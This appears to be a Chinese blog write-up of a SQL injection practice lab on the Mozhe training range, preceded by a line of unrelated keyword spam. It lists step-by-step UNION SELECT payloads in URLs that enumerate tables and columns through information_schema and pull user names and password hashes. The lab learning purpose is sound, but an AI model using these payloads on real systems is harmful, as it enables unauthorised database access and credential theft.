深圳住房和建设局网站哪里预约,如何查看网站是不是wordpress,企业网站建设的三种方式,三明企业网站建设公司背景#xff1a; 自己在墨者官网靶场练习的时候#xff0c;一直出错#xff0c;手工容易出错#xff0c;所以列举一些信息供大家核对#xff0c;可以参考改动。
数据库版本version() 5.7.22-0ubuntu0.16.04.1
当前数据库名称database#xff08;) m…背景 自己在墨者官网靶场练习的时候一直出错手工容易出错所以列举一些信息供大家核对可以参考改动。
数据库版本version() 5.7.22-0ubuntu0.16.04.1
当前数据库名称database) mozhe_Discuz_StormGroup
当前数据库用户user() rootlocalhost
操作系统version_compile_os Linux
信息
一、猜列
124.70.22.208:45582/new_list.php?id-1 order by $number
结果1234只显示23
二、inmation_schema查表
124.70.22.208:45582/new_list.php?id-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schemamozhe_Discuz_StormGroup
查询结果StormGroup_member,notice
三、①StormGroup_member表中的列
124.70.22.208:45582/new_list.php?id-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_nameStormGroup_member
查询结果id,name,password,status
四、②notice表中的列
124.70.22.208:45582/new_list.php?id-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_namenotice
查询结果id,title,content,time
分析显然StormGroup_member表中的列更符合预期查其中的数据
五、查name,password
124.70.22.208:45582/new_list.php?id-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member
查询结果有两个name和对应的password。
总结 md5解密后只有一个name可以使用。手工注入较为繁琐但能锻炼对漏洞的理解读者们发现问题可私信交流。
